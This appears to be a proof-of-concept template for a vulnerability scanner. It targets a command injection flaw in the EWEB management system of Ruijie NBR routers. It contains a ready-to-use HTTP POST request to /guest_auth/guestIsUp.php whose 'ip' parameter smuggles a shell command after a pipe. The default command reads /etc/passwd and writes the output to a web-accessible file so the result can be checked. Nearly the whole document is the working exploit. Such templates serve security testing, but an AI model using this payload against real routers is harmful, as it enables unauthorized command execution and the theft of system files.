<DudePoc_Name>锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞</DudePoc_Name>
<DudePoc_Description>锐捷NBR路由器 EWEB网管系统部分接口存在命令注入，导致远程命令执行获取权限。</DudePoc_Description>
<DudePoc_SetHeader>
POST /guest_auth/guestIsUp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

</DudePoc_SetHeader>
<DudePoc_SetData>
mac=1&ip=127.0.0.1|$<AttackCode>$ > Dude.txt
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData></DudePoc_VerifyData>
<DudePoc_VerifyFile>/guest_auth/Dude.txt</DudePoc_VerifyFile>
<DudePoc_AttackCode>cat /etc/passwd</DudePoc_AttackCode>
